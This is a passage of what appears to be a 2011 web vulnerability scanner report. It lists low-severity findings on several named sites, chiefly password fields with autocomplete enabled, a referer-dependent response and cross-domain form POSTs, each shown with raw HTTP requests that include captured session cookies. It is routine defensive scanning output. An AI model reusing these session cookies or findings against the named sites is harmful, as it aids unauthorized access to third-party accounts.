Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 14:45:35 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 14896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
9.11. http://www.paperg.com/publishers/placelocal.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /publishers/placelocal.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /publishers/placelocal.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305561344.2; __utmc=1; __utmz=1.1305561344.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1.1.10.1305561344; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:20:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 13131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
9.12. http://www.paperg.com/support.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /support.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /support.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:13 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 12289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
9.13. https://www.paperg.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.paperg.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:46:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2977


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<div id="cMiddle" align=center>
       
           <form action="login.php" method="post" style="width:100%">
               <table class="login_div">
...[SNIP]...
<td><input type="password" name="pass" /></td>
...[SNIP]...
9.14. https://www.paperg.com/post.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /post.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmb=27786045;

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 16:45:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<div id="login">
   <form id="client-login" action="login.php" method="post">
   <input class="text" name="email" type="text" value="email" onclick="clickclear(this, 'email')" onblur="clickrecall(this,'email')" />
   <input class="text" name="pass" type="password" value="password" onclick="clickclear(this, 'password')" onblur="clickrecall(this,'password')" />
           <input type="image" src="images/rightarrow.png" class="button" />
...[SNIP]...
9.15. https://www.paperg.com/post.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /post.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmb=27786045;

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 16:45:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
</script>
                       
               
                                                                           <form name="campaign_form" enctype="multipart/form-data" action="process.php" method="POST" onsubmit="onFormSubmit();">
                   <input type="hidden" name="owner_id" value="0">
...[SNIP]...
<td>
                               <input type="password" name="login_password" id="login_password" onkeydown="on_login_enter(event);" onchange="saveInput(this.getAttribute( 'name' ));"/>
                               <span id="msg_login_password">
...[SNIP]...
<td>
                               <input maxlength=30 name="account_password" type="password" onchange="saveInput(this.getAttribute( 'name' ));" />
                               <br />
...[SNIP]...
<td>
                               <input maxlength=30 name="account_confirm_password" type="password" />
                               <span id="msg_account_confirm_password">
...[SNIP]...
9.16. http://www.placelocal.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.placelocal.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/forgot_password.php
Cookie: PHPSESSID=4d3oqoeopjg5os4f6kha7nto63; __utma=94208860.1014089333.1305558942.1305558942.1305562510.2; __utmc=94208860; __utmz=94208860.1305562510.2.2.utmcsr=paperg.com|utmccn=(referral)|utmcmd=referral|utmcct=/contact.php; __utmb=94208860.1.10.1305562510; olarkld=1305562510086; wcsid=82HE08PKOH0GNJJUGLKIDRZJ41167521; _oklv=1305562512332; hblid=2AUKUUQZQC24174KYBGUP1HK41167521

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 16:15:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: success=deleted; expires=Sun, 16-May-2010 16:15:20 GMT
Set-Cookie: success_cookie_name=deleted; expires=Sun, 16-May-2010 16:15:20 GMT
Vary: Accept-Encoding
Content-Length: 13932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="login">


<form id="loginForm" method="post" action="https://www.placelocal.com/">
<span id="error_login" class="error">
...[SNIP]...
</div><input type="password" id="password" name="password"/><div class="clear">
...[SNIP]...
9.17. http://www.placelocal.com/forgot_password.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.placelocal.com
Path:   /forgot_password.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /forgot_password.php HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/company.php

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 15:19:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Set-Cookie: PHPSESSID=3oik1g2sp46e2tucskv23ggv70; expires=Thu, 03-Oct-2052 06:39:20 GMT; path=/; domain=.placelocal.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: success=deleted; expires=Sun, 16-May-2010 15:19:39 GMT
Set-Cookie: success_cookie_name=deleted; expires=Sun, 16-May-2010 15:19:39 GMT
Vary: Accept-Encoding
Content-Length: 6267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="login">


<form id="loginForm" method="post" action="https://www.placelocal.com/">
<span id="error_login" class="error">
...[SNIP]...
</div><input type="password" id="password" name="password"/><div class="clear">
...[SNIP]...
9.18. https://www.planservices.com/regions/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.planservices.com
Path:   /regions/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /regions/ HTTP/1.1
Host: www.planservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: 01 Nov 1990 01:00:01 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT",policyref=/w3c/p3p.xml
Set-Cookie: TESTCOOKIES=Test;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: CFID=52158672;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: CFTOKEN=42630575;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: JSESSIONID=0430e8dac9c0442b7260TR;path=/
Set-Cookie: PLANID=;path=/
Set-Cookie: GROUPID=;path=/
Set-Cookie: IID=;path=/
Set-Cookie: WEBUSAGE=124614;path=/
Set-Cookie: USERINTERNAL=0;path=/
Set-Cookie: VIRTDIR=regions;path=/
Date: Mon, 16 May 2011 16:46:14 GMT
Connection: close


<script type="text/javascript" language="javascript">
   var str="launch,Bisys_TopFrame.cfm"; //string value to designate calls
   var urlLocation = self.location.href.toLowerCase(); //string valu
...[SNIP]...
<td ALIGN="LEFT" VALIGN="TOP">    
           <form NAME="LogonForm" ACTION="ProcessLogon.cfm" METHOD=POST onSubmit="return _CF_checkLogonForm(this)">            
           <table ID="LogonTable" WIDTH="375" cellspacing="2" cellpadding="2" BORDER=0 bgcolor="#6E8F30" STYLE="{font-family: Arial; font-size: 13px;}">
...[SNIP]...
<TD><INPUT TYPE="password" NAME="WebUserID" VALUE="" SIZE="16" MAXLENGTH="25" tabindex="1"></TD>
...[SNIP]...
10. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xsnet.com
Path:   /it-asset-disposition-services/

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /it-asset-disposition-services/ HTTP/1.1
Host: www.xsnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.xsnet.com/
Cookie: .ASPXANONYMOUS=XJ4onn1KzAEkAAAAMzIwYTQ3NDctN2Q1NC00YjBjLWEzNzctMjU4NmNhMmQ0MDM20; HUBSPOT32=236000428.20480.0000; hubspotutktzo=-5; __utma=15864383.1350355448.1305565681.1305565681.1305565681.1; __utmb=15864383.1.10.1305565681; __utmc=15864383; __utmz=15864383.1305565681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-05-16%2013%3A07%3A56; hubspotutk=86af4891a61346df815605a4fd7b2019; hubspotvd=86af4891a61346df815605a4fd7b2019; hubspotvw=86af4891a61346df815605a4fd7b2019; hubspotvm=86af4891a61346df815605a4fd7b2019; hsfirstvisit=http%3A%2F%2Fwww.xsnet.com%2F||2011-05-16%2013%3A07%3A56

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50347
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1zi2sl55qbpilpqjcez3l0rk; path=/; HttpOnly
Date: Mon, 16 May 2011 17:08:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head id="Head">

<script type="text/javascript">
//<![CDATA[
window.hubspot={splitTimes:{preHead:new Date()}};
//]]>
</script>
<meta id="MetaDescription" name="description" content="XSi provides IT Asset Disposition Services for Enterprise IT Equipment"><meta id="MetaKeywords" name="keywords" content=" ITAD, asset disposition, asset recovery, recycling"><meta id="MetaCopyright" name="copyright" content="Copyright (c) 2011 by "><meta id="MetaGenerator" name="generator" content="HubSpot "><meta id="MetaAuthor" name="author"><meta http-equiv="X-UA-Compatible" content="IE=Emulate8">
<style id="StylePlaceholder" type="text/css"></style>
<script type="text/javascript" src="/sw/website/web-all.js?v=8" ></script>
<link rel="Stylesheet" href="/sw/website/web-all.css?v=8" />

<link id="_Portals__default_Skins_Brighton_" rel="stylesheet" type="text/css" media="screen" href="/Portals/_default/Skins/Brighton/skin.css" /><link id="PORTAL_CSS_64787" rel="stylesheet" type="text/css" media="screen" href="/Portals/64787/custom.css" />
<script src="http://cdn.jquerytools.org/1.2.2/full/jquery.tools.min.js" type="text/javascript"></script>
<script src="/Portals/64787/js/xsi.js?v0.0.1" type="text/javascript"></script>

<meta name="google-site-verification" content="HhGrJtjXI9Rx8SBo8-CL54m5Pu6xnJcY0AGgBLoJVnI" />
<style>
<!--

-->
</style>

<link href="http://www.xsnet.com/it-asset-disposition-services/" rel="canonical" /><title>
   XSi's ITAD Services
</title><link rel="stylesheet" href="//static.hubspot.com/final/css/common/jquery/jquery.fancybox-1.3.1-adjusted.css" type="text/css" />
<script type="text/javascript" src="//static.hubspot.com/js/hui/core.js"></script>
<link rel="alternate" type="applica
...[SNIP]...

Request 2

GET /it-asset-disposition-services/ HTTP/1.1
Host: www.xsnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: .ASPXANONYMOUS=XJ4onn1KzAEkAAAAMzIwYTQ3NDctN2Q1NC00YjBjLWEzNzctMjU4NmNhMmQ0MDM20; HUBSPOT32=236000428.20480.0000; hubspotutktzo=-5; __utma=15864383.1350355448.1305565681.1305565681.1305565681.1; __utmb=15864383.1.10.1305565681; __utmc=15864383; __utmz=15864383.1305565681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-05-16%2013%3A07%3A56; hubspotutk=86af4891a61346df815605a4fd7b2019; hubspotvd=86af4891a61346df815605a4fd7b2019; hubspotvw=86af4891a61346df815605a4fd7b2019; hubspotvm=86af4891a61346df815605a4fd7b2019; hsfirstvisit=http%3A%2F%2Fwww.xsnet.com%2F||2011-05-16%2013%3A07%3A56

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50347
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 17:08:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head id="Head">

<script type="text/javascript">
//<![CDATA[
window.hubspot={splitTimes:{preHead:new Date()}};
//]]>
</script>
<meta id="MetaDescription" name="description" content="XSi provides IT Asset Disposition Services for Enterprise IT Equipment"><meta id="MetaKeywords" name="keywords" content=" ITAD, asset disposition, asset recovery, recycling"><meta id="MetaCopyright" name="copyright" content="Copyright (c) 2011 by "><meta id="MetaGenerator" name="generator" content="HubSpot "><meta id="MetaAuthor" name="author"><meta http-equiv="X-UA-Compatible" content="IE=Emulate8">
<style id="StylePlaceholder" type="text/css"></style>
<script type="text/javascript" src="/sw/website/web-all.js?v=8" ></script>
<link rel="Stylesheet" href="/sw/website/web-all.css?v=8" />

<link id="_Portals__default_Skins_Brighton_" rel="stylesheet" type="text/css" media="screen" href="/Portals/_default/Skins/Brighton/skin.css" /><link id="PORTAL_CSS_64787" rel="stylesheet" type="text/css" media="screen" href="/Portals/64787/custom.css" />
<script src="http://cdn.jquerytools.org/1.2.2/full/jquery.tools.min.js" type="text/javascript"></script>
<script src="/Portals/64787/js/xsi.js?v0.0.1" type="text/javascript"></script>

<meta name="google-site-verification" content="HhGrJtjXI9Rx8SBo8-CL54m5Pu6xnJcY0AGgBLoJVnI" />
<style>
<!--

-->
</style>

<link href="http://www.xsnet.com/it-asset-disposition-services/" rel="canonical" /><title>
   XSi's ITAD Services
</title><link rel="stylesheet" href="//static.hubspot.com/final/css/common/jquery/jquery.fancybox-1.3.1-adjusted.css" type="text/css" />
<script type="text/javascript" src="//static.hubspot.com/js/hui/core.js"></script>
<link rel="alternate" type="application/rss+xml" title="XSi&#x27;s Blog&#x3a; The Alternative in IT Maintenan
...[SNIP]...
11. Cross-domain POST  previous  next
There are 10 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

11.1. http://cigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cigna.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain cigna.benefitnation.net. The form contains the following fields:

Request

GET / HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:29:10 GMT
Content-type: text/html
Cache-control: no-cache
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!--Note: formatting/beautifying this code seems to break something. Leave as-is. -->

<html>
<head>

...[SNIP]...
</script>

           <form name="dataform" onsubmit="javascript:return submit_prov_form()" action="http://cigna.benefitnation.net/cigna/(r2pvr2jci5g4qh45dlnyliqj)/Physician.aspx" method="post" id="frm_pdSearch">
           <!-- <form name="dataform" action="http://cigna.benefitnation.net/cigna/(r2pvr2jci5g4qh45dlnyliqj)/Physician.aspx" method="post">
...[SNIP]...
11.2. http://www.frontrowusa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontrowusa.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.frontrowusa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:22:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Set-Cookie: PHPSESSID=b0i6udgq1j7b7hktoeaq8jt5f5; path=/; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="width:175px; padding-top: 35px;" >
<form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;"><span style="background-color: #006699; float:right;margin-right:5;margin-top:3">
...[SNIP]...
11.3. http://www.frontrowusa.com/Concerts/U2_Tickets.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontrowusa.com
Path:   /Concerts/U2_Tickets.htm

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET /Concerts/U2_Tickets.htm HTTP/1.1
Host: www.frontrowusa.com
Proxy-Connection: keep-alive
Referer: http://www.frontrowusa.com/Sell-Tickets
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.3.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:26:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26045

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="width:175px; padding-top: 35px;" >
<form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;"><span style="background-color: #006699; float:right;margin-right:5;margin-top:3">
...[SNIP]...
11.4. http://www.frontrowusa.com/Event/U2_Rescheduled_from_6/12/2010_Invesco_Field_at_Mile_High_U2_2011-05-21_7:00_PM_Tickets.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontrowusa.com
Path:   /Event/U2_Rescheduled_from_6/12/2010_Invesco_Field_at_Mile_High_U2_2011-05-21_7:00_PM_Tickets.htm

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET /Event/U2_Rescheduled_from_6/12/2010_Invesco_Field_at_Mile_High_U2_2011-05-21_7:00_PM_Tickets.htm HTTP/1.1
Host: www.frontrowusa.com
Proxy-Connection: keep-alive
Referer: http://www.frontrowusa.com/Concerts/U2_Tickets.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
